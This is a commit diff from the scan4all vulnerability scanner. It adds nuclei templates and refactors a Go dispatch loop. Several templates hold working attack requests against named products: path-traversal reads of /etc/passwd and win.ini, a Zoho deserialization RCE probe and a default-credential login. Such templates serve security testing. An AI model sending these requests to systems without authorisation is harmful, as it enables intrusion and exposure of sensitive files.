crash.software
Projects
Pull Requests
Issues
Builds
scan4all
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY scan4all Commits 64601ac2
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/README.md
    skipped 41 lines
    42 42   
    43 43  | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
    44 44  |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
    45  -| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
    46  -| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
    47  -| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
    48  -| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
    49  -| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
    50  -| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
    51  -| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
    52  -| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
    53  -| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
    54  -| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
     45 +| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
     46 +| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
     47 +| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
     48 +| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
     49 +| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
     50 +| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
     51 +| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
     52 +| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
     53 +| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
     54 +| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |
    55 55   
    56  -**294 directories, 4145 files**.
     56 +**295 directories, 4195 files**.
    57 57   
    58 58  </td>
    59 59  </tr>
    skipped 38 lines
  • config/nuclei-templates/TEMPLATES-STATS.json
    Unable to diff as some line is too long.
  • config/nuclei-templates/TEMPLATES-STATS.md
    Diff is too large to be displayed.
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/TOP-10.md
    1 1  | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
    2 2  |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
    3  -| cve | 1388 | daffainfo | 630 | cves | 1363 | info | 1450 | http | 3773 |
    4  -| panel | 642 | dhiyaneshdk | 558 | exposed-panels | 649 | high | 974 | file | 76 |
    5  -| edb | 548 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
    6  -| lfi | 496 | pdteam | 269 | technologies | 278 | critical | 469 | dns | 17 |
    7  -| xss | 472 | geeknik | 187 | exposures | 273 | low | 219 | | |
    8  -| wordpress | 415 | dwisiswant0 | 169 | token-spray | 230 | unknown | 7 | | |
    9  -| exposure | 394 | 0x_akoko | 158 | misconfiguration | 217 | | | | |
    10  -| cve2021 | 343 | princechaddha | 150 | workflows | 189 | | | | |
    11  -| rce | 335 | pussycat0x | 133 | default-logins | 102 | | | | |
    12  -| wp-plugin | 312 | ritikchaddha | 130 | file | 76 | | | | |
     3 +| cve | 1414 | daffainfo | 630 | cves | 1389 | info | 1463 | http | 3823 |
     4 +| panel | 649 | dhiyaneshdk | 577 | exposed-panels | 656 | high | 1000 | file | 76 |
     5 +| edb | 557 | pikpikcu | 326 | vulnerabilities | 510 | medium | 811 | network | 51 |
     6 +| lfi | 500 | pdteam | 269 | technologies | 280 | critical | 475 | dns | 17 |
     7 +| xss | 486 | geeknik | 187 | exposures | 273 | low | 221 | | |
     8 +| wordpress | 417 | dwisiswant0 | 169 | misconfiguration | 231 | unknown | 10 | | |
     9 +| exposure | 404 | 0x_akoko | 162 | token-spray | 230 | | | | |
     10 +| cve2021 | 350 | princechaddha | 150 | workflows | 189 | | | | |
     11 +| rce | 335 | ritikchaddha | 135 | default-logins | 102 | | | | |
     12 +| wp-plugin | 314 | pussycat0x | 133 | file | 76 | | | | |
    13 13   
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2014/CVE-2014-8676.yaml
     1 +id: CVE-2014-8676
     2 + 
     3 +info:
     4 + name: Simple Online Planning Tool 1.3.2 - Directory Traversal
     5 + author: 0x_Akoko
     6 + severity: medium
     7 + description: |
     8 + Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
     9 + reference:
     10 + - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2014-8676
     12 + - https://www.exploit-db.com/exploits/37604/
     13 + - http://seclists.org/fulldisclosure/2015/Jul/44
     14 + classification:
     15 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     16 + cvss-score: 5.3
     17 + cve-id: CVE-2014-8676
     18 + cwe-id: CWE-22
     19 + tags: cve,cve2014,soplanning,lfi,packetstorm
     20 + 
     21 +requests:
     22 + - method: GET
     23 + path:
     24 + - "{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"
     25 + 
     26 + matchers-condition: and
     27 + matchers:
     28 + - type: regex
     29 + regex:
     30 + - "root:[x*]:0:0"
     31 + 
     32 + - type: status
     33 + status:
     34 + - 200
     35 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2015/CVE-2015-7245.yaml
     1 +id: CVE-2015-7245
     2 + 
     3 +info:
     4 + name: D-Link DVG-N5402SP - Path Traversal
     5 + author: 0x_Akoko
     6 + severity: high
     7 + description: |
     8 + Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
     9 + reference:
     10 + - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
     11 + - https://www.exploit-db.com/exploits/39409/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
     13 + classification:
     14 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     15 + cvss-score: 7.5
     16 + cve-id: CVE-2015-7245
     17 + cwe-id: CWE-22
     18 + tags: cve,cve2015,dlink,lfi,packetstorm,edb
     19 + 
     20 +requests:
     21 + - raw:
     22 + - |
     23 + POST /cgibin/webproc HTTP/1.1
     24 + Host: {{Hostname}}
     25 + 
     26 + getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
     27 + 
     28 + matchers:
     29 + - type: regex
     30 + part: body
     31 + regex:
     32 + - "root:.*:0:0:"
     33 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2016/CVE-2016-6601.yaml
    skipped 13 lines
    14 14   cvss-score: 7.5
    15 15   cve-id: CVE-2016-6601
    16 16   cwe-id: CWE-22
    17  - tags: cve,cve2016,zoho,lfi,webnms
     17 + tags: edb,cve,cve2016,zoho,lfi,webnms
    18 18   
    19 19  requests:
    20 20   - method: GET
    skipped 13 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2021/CVE-2021-35380.yaml
     1 +id: CVE-2021-35380
     2 + 
     3 +info:
     4 + name: TermTalk Server 3.24.0.2 - Unauthenticated Arbitrary File Read
     5 + author: fxploit
     6 + severity: high
     7 + description: |
     8 + A Directory Traversal vulnerability exists in Solari di Udine TermTalk Server (TTServer) 3.24.0.2, which lets an unauthenticated malicious user gain access to the files on the remote system by gaining access to the relative path of the file they want to download.
     9 + reference:
     10 + - https://www.swascan.com/solari-di-udine/
     11 + - https://www.exploit-db.com/exploits/50638
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2021-35380
     13 + classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     15 + cvss-score: 7.5
     16 + cve-id: CVE-2021-35380
     17 + cwe-id: CWE-22
     18 + tags: cve,cve2022,termtalk,lfi,unauth,lfr,edb
     19 + 
     20 +requests:
     21 + - method: GET
     22 + path:
     23 + - "{{BaseURL}}/file?valore=../../../../../windows/win.ini"
     24 + 
     25 + matchers:
     26 + - type: word
     27 + part: body
     28 + words:
     29 + - "bit app support"
     30 + - "fonts"
     31 + - "extensions"
     32 + condition: and
     33 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-31269.yaml
    skipped 11 lines
    12 12   - https://nvd.nist.gov/vuln/detail/CVE-2022-31269
    13 13   - https://eg.linkedin.com/in/omar-1-hashem
    14 14   classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
     16 + cvss-score: 8.2
    15 17   cve-id: CVE-2022-31269
     18 + cwe-id: CWE-798
    16 19   metadata:
    17 20   shodan-query: http.title:"Linear eMerge"
    18 21   verified: "true"
    skipped 29 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-31798.yaml
    skipped 2 lines
    3 3  info:
    4 4   name: Nortek Linear eMerge E3-Series - XSS
    5 5   author: ritikchaddha
    6  - severity: high
     6 + severity: medium
    7 7   description: |
    8 8   There is local session fixation that chained with reflected cross-site scripting leads to account take over of admin or less privileged users.
    9 9   reference:
    skipped 1 lines
    11 11   - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31798
    12 12   - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html
    13 13   classification:
     14 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     15 + cvss-score: 6.1
    14 16   cve-id: CVE-2022-31798
     17 + cwe-id: CWE-79
    15 18   metadata:
    16 19   shodan-query: http.title:"eMerge"
    17 20   verified: "true"
    skipped 23 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2022/CVE-2022-35405.yaml
     1 +id: CVE-2022-35405
     2 + 
     3 +info:
     4 + name: Zoho ManageEngine Password Manager Pro - Unauthenticated Remote Command Execution
     5 + author: true13
     6 + severity: critical
     7 + description: |
     8 + This is a de-serialization vulnerability that causes unauthenticated RCE in XML-RPC of Zoho Manage Engine Password Manager Pro.
     9 + reference:
     10 + - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/zoho_password_manager_pro_xml_rpc_rce.rb
     11 + - https://xz.aliyun.com/t/11578
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2022-35405
     13 + - https://www.manageengine.com/products/passwordmanagerpro/advisory/cve-2022-35405.html
     14 + classification:
     15 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     16 + cvss-score: 9.8
     17 + cve-id: CVE-2022-35405
     18 + metadata:
     19 + shodan-query: http.title:"ManageEngine Password"
     20 + tags: cve,cve2022,rce,zoho,passwordmanager,deserialization,unauth,msf
     21 + 
     22 +requests:
     23 + - raw:
     24 + - |
     25 + POST /xmlrpc HTTP/1.1
     26 + Host: {{Hostname}}
     27 + Content-Type: text/xml
     28 + 
     29 + <?xml version="1.0"?>
     30 + <methodCall>
     31 + <methodName>ProjectDiscovery</methodName>
     32 + <params>
     33 + <param>
     34 + <value>
     35 + <struct>
     36 + <member>
     37 + <name>test</name>
     38 + <value>
     39 + <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions"></serializable>
     40 + </value>
     41 + </member>
     42 + </struct>
     43 + </value>
     44 + </param>
     45 + </params>
     46 + </methodCall>
     47 + 
     48 + matchers-condition: and
     49 + matchers:
     50 + - type: word
     51 + part: body
     52 + words:
     53 + - "Failed to read result object: null"
     54 + 
     55 + - type: word
     56 + part: header
     57 + words:
     58 + - text/xml
     59 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/default-logins/3com/3com-nj2000-default-login.yaml
     1 +id: 3com-nj2000-default-login
     2 + 
     3 +info:
     4 + name: 3COM NJ2000 Default Login
     5 + author: daffainfo
     6 + severity: high
     7 + description: 3COM NJ2000 default admin credentials were discovered.
     8 + reference:
     9 + - https://www.manualslib.com/manual/204158/3com-Intellijack-Nj2000.html?page=12
     10 + metadata:
     11 + verified: true
     12 + shodan-query: http.title:"ManageEngine Password"
     13 + fofa-query: body="NJ2000"
     14 + tags: default-login,3com,nj2000
     15 + 
     16 +requests:
     17 + - raw:
     18 + - |
     19 + POST /login.html HTTP/1.1
     20 + Host: {{Hostname}}
     21 + Content-Type: application/x-www-form-urlencoded
     22 + 
     23 + password=password
     24 + 
     25 + matchers-condition: and
     26 + matchers:
     27 + - type: word
     28 + part: body
     29 + words:
     30 + - '<title>3Com Corporation Web Interface</title>'
     31 + - '<frame name="mainFrame" src="blank.html">'
     32 + condition: and
     33 + 
     34 + - type: status
     35 + status:
     36 + - 200
     37 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/cvent-panel-detect.yaml
     1 +id: cvent-panel-detect
     2 + 
     3 +info:
     4 + name: Cvent Panel Detect
     5 + author: tess
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: http.html:"Cvent Inc"
     10 + tags: panel,cvent
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - '{{BaseURL}}'
     16 + - '{{BaseURL}}/Login.aspx'
     17 + - '{{BaseURL}}/manager/login.aspx'
     18 + - '{{BaseURL}}/GDSHost/Default.aspx'
     19 + - '{{BaseURL}}/events/EventRsvp.aspx'
     20 + 
     21 + stop-at-first-match: true
     22 + redirects: true
     23 + max-redirects: 2
     24 + matchers:
     25 + - type: word
     26 + part: body
     27 + words:
     28 + - "Cvent Inc"
     29 + - "Cvent, Inc."
     30 + condition: or
     31 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/exposed-panels/omniampx-panel.yaml
     1 +id: omniampx-panel
     2 + 
     3 +info:
     4 + name: Omnia Node MPX - Panel
     5 + author: arafatansari
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: http.html:"Omnia MPX"
     10 + tags: panel,omnia,omniampx
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - '{{BaseURL}}/login'
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: word
     20 + words:
     21 + - "Omnia MPX Node | Login"
     22 + 
     23 + - type: status
     24 + status:
     25 + - 200
     26 + 
  • ■ ■ ■ ■ ■ ■
    engine/engine.go
     1 +package engine
     2 + 
     3 +import (
     4 + "github.com/hktalent/scan4all/lib/util"
     5 + "github.com/hktalent/scan4all/pocs_go"
     6 + "log"
     7 +)
     8 + 
     9 +// 引擎总入口
     10 +func init() {
     11 + util.RegInitFunc(func() {
     12 + // 异步启动一个线程处理检测,避免
     13 + go func() {
     14 + //nMax := 120 // 等xxx秒都没有消息进入就退出
     15 + //nCnt := 0
     16 + for {
     17 + select {
     18 + case <-util.Ctx_global.Done():
     19 + close(util.PocCheck_pipe)
     20 + return
     21 + case x1, ok := <-util.PocCheck_pipe:
     22 + if util.GetValAsBool("NoPOC") || nil == x1 || !ok {
     23 + //close(util.PocCheck_pipe) // 这行会在 NoPOC该标志开启时,其他进程无法传递过来而出错
     24 + log.Println("go_poc_checkout is over")
     25 + continue
     26 + }
     27 + //nCnt = 0
     28 + log.Printf("<-lib.PocCheck_pipe: %+v %s", *x1.Wappalyzertechnologies, x1.URL)
     29 + util.DoSyncFunc(func() {
     30 + func(x99 *util.PocCheck) {
     31 + pocs_go.POCcheck(*x99.Wappalyzertechnologies, x99.URL, x99.FinalURL, x99.Checklog4j)
     32 + }(x1)
     33 + })
     34 + default:
     35 + //var f01 float32 = float32(nCnt) / float32(nMax) * float32(100)
     36 + //fmt.Printf(" Asynchronous go PoCs detection task %%%0.2f ....\r", f01)
     37 + //<-time.After(time.Duration(1) * time.Second)
     38 + //nCnt += 1
     39 + //if nMax <= nCnt {
     40 + // close(util.PocCheck_pipe)
     41 + // return
     42 + //}
     43 + }
     44 + }
     45 + }()
     46 + })
     47 +}
     48 + 
  • ■ ■ ■ ■ ■ ■
    pocs_go/go_poc_check.go
    skipped 24 lines
    25 25   "github.com/hktalent/scan4all/pocs_go/zabbix"
    26 26   "log"
    27 27   "net/url"
    28  - "os"
    29 28   "strings"
    30 29  )
    31 30   
    skipped 238 lines
    270 269   return technologies
    271 270  }
    272 271   
    273  -func init() {
    274  - if os.Getenv("NoPOC") == "true" {
    275  - //close(util.PocCheck_pipe) // 这行会在 NoPOC该标志开启时,其他进程无法传递过来而出错
    276  - return
    277  - }
    278  - util.RegInitFunc(func() {
    279  - // 异步启动一个线程处理检测,避免
    280  - go func() {
    281  - //nMax := 120 // 等xxx秒都没有消息进入就退出
    282  - //nCnt := 0
    283  - for {
    284  - select {
    285  - case <-util.Ctx_global.Done():
    286  - close(util.PocCheck_pipe)
    287  - return
    288  - case x1, ok := <-util.PocCheck_pipe:
    289  - if nil == x1 || !ok {
    290  - log.Println("go_poc_checkout is over")
    291  - return
    292  - }
    293  - //nCnt = 0
    294  - log.Printf("<-lib.PocCheck_pipe: %+v %s", *x1.Wappalyzertechnologies, x1.URL)
    295  - util.DoSyncFunc(func() {
    296  - func(x99 *util.PocCheck) {
    297  - POCcheck(*x99.Wappalyzertechnologies, x99.URL, x99.FinalURL, x99.Checklog4j)
    298  - }(x1)
    299  - })
    300  - default:
    301  - //var f01 float32 = float32(nCnt) / float32(nMax) * float32(100)
    302  - //fmt.Printf(" Asynchronous go PoCs detection task %%%0.2f ....\r", f01)
    303  - //<-time.After(time.Duration(1) * time.Second)
    304  - //nCnt += 1
    305  - //if nMax <= nCnt {
    306  - // close(util.PocCheck_pipe)
    307  - // return
    308  - //}
    309  - }
    310  - }
    311  - }()
    312  - })
    313  -}
    314  - 
Please wait...
Page is in error, reload to recover